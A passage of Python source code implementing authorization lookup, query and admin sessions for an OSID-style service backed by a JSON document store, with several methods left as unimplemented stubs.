def use_federated_vault_view(self):
"""Federates the view for methods in this session.
A federated view will include authorizations in vaults which are
children of this vault in the vault hierarchy.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_federated_bin_view
self._use_federated_catalog_view()
def use_isolated_vault_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts lookups to this vault only.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_isolated_bin_view
self._use_isolated_catalog_view()
def use_effective_authorization_view(self):
"""Only authorizations whose effective dates are current are returned by methods in this session.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.use_effective_relationship_view
self._use_effective_view()
def use_any_effective_authorization_view(self):
"""All authorizations of any effective dates are returned by all methods in this session.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.use_any_effective_relationship_view
self._use_any_effective_view()
def use_implicit_authorization_view(self):
"""Sets the view for methods in this session to implicit authorizations.
An implicit view will include authorizations derived from other
authorizations as a result of the ``Qualifier,`` ``Function`` or
``Resource`` hierarchies. This method is the opposite of
``explicitAuthorizationView()``.
*compliance: mandatory -- This method is must be implemented.*
"""
raise errors.Unimplemented()
def use_explicit_authorization_view(self):
"""Sets the view for methods in this session to explicit authorizations.
An explicit view includes only those authorizations that were
explicitly defined and not implied. This method is the opposite
of ``implicitAuthorizationView()``.
*compliance: mandatory -- This method is must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorization(self, authorization_id):
"""Gets the ``Authorization`` specified by its ``Id``.
In plenary mode, the exact ``Id`` is found or a ``NotFound``
results. Otherwise, the returned ``Authorization`` may have a
different ``Id`` than requested, such as the case where a
duplicate ``Id`` was assigned to an ``Authorization`` and
retained for compatibility.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization`` to retrieve
return: (osid.authorization.Authorization) - the returned
``Authorization``
raise: NotFound - no ``Authorization`` found with the given
``Id``
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resource
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find_one(
dict({'_id': ObjectId(self._get_id(authorization_id, 'authorization').get_identifier())},
**self._view_filter()))
return objects.Authorization(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_authorizations_by_ids(self, authorization_ids):
"""Gets an ``AuthorizationList`` corresponding to the given ``IdList``.
In plenary mode, the returned list contains all of the
authorizations specified in the ``Id`` list, in the order of the
list, including duplicates, or an error results if an ``Id`` in
the supplied list is not found or inaccessible. Otherwise,
inaccessible ``Authorizations`` may be omitted from the list and
may present the elements in any order including returning a
unique set.
arg: authorization_ids (osid.id.IdList): the list of ``Ids``
to retrieve
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NotFound - an ``Id was`` not found
raise: NullArgument - ``authorization_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_ids
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
object_id_list = []
for i in authorization_ids:
object_id_list.append(ObjectId(self._get_id(i, 'authorization').get_identifier()))
result = collection.find(
dict({'_id': {'$in': object_id_list}},
**self._view_filter()))
result = list(result)
sorted_result = []
for object_id in object_id_list:
for object_map in result:
if object_map['_id'] == object_id:
sorted_result.append(object_map)
break
return objects.AuthorizationList(sorted_result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_authorizations_by_genus_type(self, authorization_genus_type):
"""Gets an ``AuthorizationList`` corresponding to the given authorization genus ``Type`` which does not include authorizations of genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: authorization_genus_type (osid.type.Type): an
authorization genus type
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: NullArgument - ``authorization_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_genus_type
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'genusTypeId': str(authorization_genus_type)},
**self._view_filter())).sort('_id', DESCENDING)
return objects.AuthorizationList(result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_authorizations_by_parent_genus_type(self, authorization_genus_type):
"""Gets an ``AuthorizationList`` corresponding to the given authorization genus ``Type`` and include authorizations of genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: authorization_genus_type (osid.type.Type): an
authorization genus type
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: NullArgument - ``authorization_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_parent_genus_type
# STILL NEED TO IMPLEMENT!!!
return objects.AuthorizationList([])
@utilities.arguments_not_none
def get_authorizations_by_record_type(self, authorization_record_type):
"""Gets an ``AuthorizationList`` containing the given authorization record ``Type``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: authorization_record_type (osid.type.Type): an
authorization record type
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: NullArgument - ``authorization_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_record_type
# STILL NEED TO IMPLEMENT!!!
return objects.AuthorizationList([])
@utilities.arguments_not_none
def get_authorizations_on_date(self, from_, to):
"""Gets an ``AuthorizationList`` effective during the entire given date range inclusive but not confined to the date range.
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``from`` or ``to`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.get_relationships_on_date
authorization_list = []
for authorization in self.get_authorizations():
if overlap(from_, to, authorization.start_date, authorization.end_date):
authorization_list.append(authorization)
return objects.AuthorizationList(authorization_list, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_resource(self, resource_id):
"""Gets a list of ``Authorizations`` associated with a given resource.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned. In plenary mode, the
returned list contains all known authorizations or an error
results. Otherwise, the returned list may contain only those
authorizations that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``resource_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_resource_on_date(self, resource_id, from_, to):
"""Gets an ``AuthorizationList`` effective during the entire given date range inclusive but not confined to the date range.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
In effective mode, authorizations are returned that are
currently effective. In any effective mode, active
authorizations and those currently expired are returned.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``resource_id, from`` or ``to`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_agent(self, agent_id):
"""Gets a list of ``Authorizations`` associated with a given agent.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: agent_id (osid.id.Id): an agent ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``agent_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_agent_on_date(self, agent_id, from_, to):
"""Gets an ``AuthorizationList`` for the given agent and effective during the entire given date range inclusive but not confined to the date range.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``agent_id, from`` or ``to`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_function(self, function_id):
"""Gets a list of ``Authorizations`` associated with a given function.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: function_id (osid.id.Id): a function ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``function_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.learning.ActivityLookupSession.get_activities_for_objective_template
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'functionId': str(function_id)},
**self._view_filter()))
return objects.AuthorizationList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_function_on_date(self, function_id, from_, to):
"""Gets an ``AuthorizationList`` for the given function and effective during the entire given date range inclusive but not confined to the date range.
arg: function_id (osid.id.Id): a function ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``function_id, from`` or ``to`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_resource_and_function(self, resource_id, function_id):
"""Gets a list of ``Authorizations`` associated with a given resource.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned. In plenary mode, the
returned list contains all known authorizations or an error
results. Otherwise, the returned list may contain only those
authorizations that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: function_id (osid.id.Id): a function ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``resource_id`` or ``function_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.get_relationships_for_peers
# NOTE: This implementation currently ignores plenary and effective views
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'sourceId': str(resource_id),
'destinationId': str(function_id)},
**self._view_filter())).sort('_id', ASCENDING)
return objects.AuthorizationList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_resource_and_function_on_date(self, resource_id, function_id, from_, to):
"""Gets an ``AuthorizationList`` effective during the entire given date range inclusive but not confined to the date range.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
In effective mode, authorizations are returned that are
currently effective. In any effective mode, active
authorizations and those currently expired are returned.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: function_id (osid.id.Id): a function ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``resource_id, function_id, from`` or
``to`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_agent_and_function(self, agent_id, function_id):
"""Gets a list of ``Authorizations`` associated with a given agent.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned. In plenary mode, the
returned list contains all known authorizations or an error
results. Otherwise, the returned list may contain only those
authorizations that are accessible through this session.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: function_id (osid.id.Id): a function ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``agent_id`` or ``function_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'agentId': str(agent_id),
'functionId': str(function_id)},
**self._view_filter())).sort('_sort_id', ASCENDING)
return objects.AuthorizationList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_agent_and_function_on_date(self, agent_id, function_id, from_, to):
"""Gets an ``AuthorizationList`` for the given agent and effective during the entire given date range inclusive but not confined to the date range.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: function_id (osid.id.Id): a function ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``agent_id, function_id, from`` or ``to``
is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_by_qualifier(self, qualifier_id):
"""Gets a list of ``Authorizations`` associated with a given qualifier.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: qualifier_id (osid.id.Id): a qualifier ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``qualifier_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_explicit_authorization(self, authorization_id):
"""Gets the explicit ``Authorization`` that generated the given implicit authorization.
If the given ``Authorization`` is explicit, then the same
``Authorization`` is returned.
arg: authorization_id (osid.id.Id): an authorization
return: (osid.authorization.Authorization) - the explicit
``Authorization``
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_authorizations(self):
"""Geta all ``Authorizations``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
return: (osid.authorization.AuthorizationList) - a list of
``Authorizations``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(self._view_filter()).sort('_id', DESCENDING)
return objects.AuthorizationList(result, runtime=self._runtime, proxy=self._proxy)
authorizations = property(fget=get_authorizations)
class AuthorizationQuerySession(abc_authorization_sessions.AuthorizationQuerySession, osid_sessions.OsidSession):
"""This session provides methods for searching ``Authorization`` objects.
The search query is constructed using the ``AuthorizationQuery``.
This session defines views that offer differing behaviors for
searching.
* federated view: searches include authorizations in ``Vaults`` of
which this vault is a ancestor in the vault hierarchy
* isolated view: searches are restricted to authorizations in this
``Vault``
* implicit authorization view: authorizations include implicit
authorizations
* explicit authorization view: only explicit authorizations are
returned
"""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._kwargs = kwargs
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_search_authorizations(self):
"""Tests if this user can perform authorization searches.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer search
operations to unauthorized users.
return: (boolean) - ``false`` if search methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceQuerySession.can_search_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def use_federated_vault_view(self):
"""Federates the view for methods in this session.
A federated view will include authorizations in vaults which are
children of this vault in the vault hierarchy.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_federated_bin_view
self._use_federated_catalog_view()
def use_isolated_vault_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts searches to this vault only.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_isolated_bin_view
self._use_isolated_catalog_view()
def use_implicit_authorization_view(self):
"""Sets the view for methods in this session to implicit authorizations.
An implicit view will include authorizations derived from other
authorizations as a result of the ``Qualifier,`` ``Function`` or
``Resource`` hierarchies. This method is the opposite of
``explicit_aut``
*compliance: mandatory -- This method is must be implemented.*
"""
raise errors.Unimplemented()
def use_explicit_authorization_view(self):
"""Sets the view for methods in this session to explicit authorizations.
An explicit view includes only those authorizations that were
explicitly defined and not implied. This method is the opposite
of ``implicitAuthorizationView()``.
*compliance: mandatory -- This method is must be implemented.*
"""
raise errors.Unimplemented()
def get_authorization_query(self):
"""Gets an authorization query.
return: (osid.authorization.AuthorizationQuery) - the
authorization query
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceQuerySession.get_resource_query_template
return queries.AuthorizationQuery(runtime=self._runtime)
authorization_query = property(fget=get_authorization_query)
@utilities.arguments_not_none
def get_authorizations_by_query(self, authorization_query):
"""Gets a list of ``Authorizations`` matching the given query.
arg: authorization_query
(osid.authorization.AuthorizationQuery): the
authorization query
return: (osid.authorization.AuthorizationList) - the returned
``AuthorizationList``
raise: NullArgument - ``authorization_query`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``authorization_query`` is not of this
service
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceQuerySession.get_resources_by_query
and_list = list()
or_list = list()
for term in authorization_query._query_terms:
if '$in' in authorization_query._query_terms[term] and '$nin' in authorization_query._query_terms[term]:
and_list.append(
{'$or': [{term: {'$in': authorization_query._query_terms[term]['$in']}},
{term: {'$nin': authorization_query._query_terms[term]['$nin']}}]})
else:
and_list.append({term: authorization_query._query_terms[term]})
for term in authorization_query._keyword_terms:
or_list.append({term: authorization_query._keyword_terms[term]})
if or_list:
and_list.append({'$or': or_list})
view_filter = self._view_filter()
if view_filter:
and_list.append(view_filter)
if and_list:
query_terms = {'$and': and_list}
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(query_terms).sort('_id', DESCENDING)
else:
result = []
return objects.AuthorizationList(result, runtime=self._runtime, proxy=self._proxy)
class AuthorizationAdminSession(abc_authorization_sessions.AuthorizationAdminSession, osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Authorizations``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create an
``Authorization,`` an ``AuthorizationForm`` is requested using
``get_authorization_form_for_create()`` specifying the desired
relationship peers and record ``Types`` or none if no record
``Types`` are needed. The returned ``AuthorizationForm`` will
indicate that it is to be used with a create operation and can be
used to examine metdata or validate data prior to creation. Once the
``AuthorizationForm`` is submiited to a create operation, it cannot
be reused with another create operation unless the first operation
was unsuccessful. Each ``AuthorizationForm`` corresponds to an
attempted transaction.
For updates, ``AuthorizationForms`` are requested to the
``Authorization`` ``Id`` that is to be updated using
``getAuthorizationFormForUpdate()``. Similarly, the
``AuthorizationForm`` has metadata about the data that can be
updated and it can perform validation before submitting the update.
The ``AuthorizationForm`` can only be used once for a successful
update and cannot be reused.
The delete operations delete ``Authorizations``. To unmap an
``Authorization`` from the current ``Vault,`` the
``AuthorizationVaultAssignmentSession`` should be used. These delete
operations attempt to remove the ``Authorization`` itself thus
removing it from all known ``Vault`` catalogs.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
"""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._forms = dict()
self._kwargs = kwargs
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_create_authorizations(self):
"""Tests if this user can create ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer create
operations to unauthorized users.
return: (boolean) - ``false`` if ``Authorization`` creation is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def can_create_authorization_with_record_types(self, authorization_record_types):
"""Tests if this user can create a single ``Authorization`` using the desired record types.
While ``AuthorizationManager.getAuthorizationRecordTypes()`` can
be used to examine which records are supported, this method
tests which record(s) are required for creating a specific
``Authorization``. Providing an empty array tests if an
``Authorization`` can be created with no records.
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (boolean) - ``true`` if ``Authorization`` creation using
the specified ``Types`` is supported, ``false``
otherwise
raise: NullArgument - ``authorization_record_types`` is
``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resource_with_record_types
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_authorization_form_for_create_for_agent(self, agent_id, function_id, qualifier_id, authorization_record_types):
"""Gets the authorization form for creating new authorizations.
A new form should be requested for each create transaction.
arg: agent_id (osid.id.Id): the agent ``Id``
arg: function_id (osid.id.Id): the function ``Id``
arg: qualifier_id (osid.id.Id): the qualifier ``Id``
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``agent_id, function_id`` or ``qualifier_id``
is not found
raise: NullArgument - ``agent_id, function_id, qualifier_id``
or ``authorization_record_types`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
if not isinstance(agent_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(function_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(qualifier_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
for arg in authorization_record_types:
if not isinstance(arg, ABCType):
raise errors.InvalidArgument('one or more argument array elements is not a valid OSID Type')
if authorization_record_types == []:
# WHY are we passing vault_id = self._catalog_id below, seems redundant:
# We probably also don't need to send agent_id. The form can now get that from the proxy
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
agent_id=agent_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
else:
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
record_types=authorization_record_types,
agent_id=agent_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
obj_form._for_update = False
self._forms[obj_form.get_id().get_identifier()] = not CREATED
return obj_form
@utilities.arguments_not_none
def get_authorization_form_for_create_for_resource(self, resource_id, function_id, qualifier_id, authorization_record_types):
"""Gets the authorization form for creating new authorizations.
A new form should be requested for each create transaction.
arg: resource_id (osid.id.Id): the resource ``Id``
arg: function_id (osid.id.Id): the function ``Id``
arg: qualifier_id (osid.id.Id): the qualifier ``Id``
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``resource_id, function_id`` or
``qualifier_id`` is not found
raise: NullArgument - ``resource_id, function_id,
qualifier_id,`` or ``authorization_record_types`` is
``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
if not isinstance(resource_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(function_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(qualifier_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
for arg in authorization_record_types:
if not isinstance(arg, ABCType):
raise errors.InvalidArgument('one or more argument array elements is not a valid OSID Type')
if authorization_record_types == []:
# WHY are we passing vault_id = self._catalog_id below, seems redundant:
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
resource_id=resource_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
prox=self._proxy)
else:
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
record_types=authorization_record_types,
resource_id=resource_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
obj_form._for_update = False
self._forms[obj_form.get_id().get_identifier()] = not CREATED
return obj_form
@utilities.arguments_not_none
def get_authorization_form_for_create_for_resource_and_trust(self, resource_id, trust_id, function_id, qualifier_id, authorization_record_types):
"""Gets the authorization form for creating new authorizations.
A new form should be requested for each create transaction.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: trust_id (osid.id.Id): an ``Id`` for a circle of trust
arg: function_id (osid.id.Id): a function ``Id``
arg: qualifier_id (osid.id.Id): the qualifier ``Id``
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``resource_id, trust_id, function_id`` , or
``qualifierid`` is not found
raise: NullArgument - ``resource_id, trust_id`` ,
``resource_id, qualifier_id`` or
``authorization_record_types`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def create_authorization(self, authorization_form):
"""Creates a new explicit ``Authorization``.
arg: authorization_form
(osid.authorization.AuthorizationForm): the
authorization form
return: (osid.authorization.Authorization) - ``t`` he new
``Authorization``
raise: IllegalState - ``authorization_form`` already used in a
create transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``authorization_form`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - ``authorization_form`` did not originate
from this service
*compliance: mandatory -- This method must be implemented.*
"""
# TODO: not using the create_resource template
# because want to prevent duplicate authorizations
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_form, ABCAuthorizationForm):
